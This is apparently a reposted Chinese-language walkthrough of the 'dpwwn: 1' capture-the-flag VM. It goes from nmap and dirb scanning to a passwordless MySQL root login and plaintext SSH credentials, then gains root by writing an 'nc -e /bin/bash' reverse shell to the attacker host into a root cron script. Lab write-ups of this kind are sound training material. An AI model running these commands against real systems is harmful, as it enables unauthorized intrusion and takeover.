dpwwn: 1

Posted ch42e

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了dpwwn: 1相关的知识,希望对你有一定的参考价值。

Description

  • Name: dpwwn: 1
  • Date release: 4 Aug 2019
  • DHCP service: Enabled
  • IP address: Automatically assign
  • Goal: Gain the root privilege and obtain the content of dpwwn-01-FLAG.txt under /root Directory.

Download

(Size: 618 MB)

主机发现

nmap -sP 192.168.91.1/24

技术图片

Kali:192.168.91.128

靶机:192.168.91.129

端口扫描

nmap -sV -p- 192.168.91.129

技术图片

开启了22端口(ssh),80端口(http),3306端口(mysql

访问80端口服务

技术图片

尝试扫描一波目录

dirb http://192.168.91.129

技术图片

发现了一个info.php文件,好像没啥用

漏洞发现

转而看看mysqlssh有没有值得利用的漏洞,然后发现mysql可root登录,密码为空

mysql -u root -h 192.168.91.129 -p

技术图片

然后发现ssh的数据库,的用户名和密码直接明文存储

show databases;
use ssh;
show tables;
select * from users;

技术图片

得到用户名和密码为:mistic/testP@$$swordmistic

漏洞利用

登录ssh

ssh mistic@192.168.91.129

技术图片

mistic用户目录下发现logrot.sh文件

#!/bin/bash
#
#LOGFILE="/var/tmp"
#SEMAPHORE="/var/tmp.semaphore"


while : ; do
  read line
  while [[ -f $SEMAPHORE ]]; do
    sleep 1s
  done
  printf "%s
" "$line" >> $LOGFILE
done

而且在crontab以root权限执行该文件

技术图片

get root

使用nc反弹shell

echo nc -e /bin/bash 192.168.91.128 1234 > logrot.sh

技术图片

在kali上监听1234端口

nc -lvp 1234

使用python增加交互

python -c ‘import pty; pty.spawn("/bin/bash")‘

技术图片

get flag:

技术图片

以上是关于dpwwn: 1的主要内容,如果未能解决你的问题,请参考以下文章

VSCode自定义代码片段1——vue主模板

vs 2010代码片段

vs 2010代码片段

1 代码片段1

sublime text3 增加代码片段(snipper)

web代码片段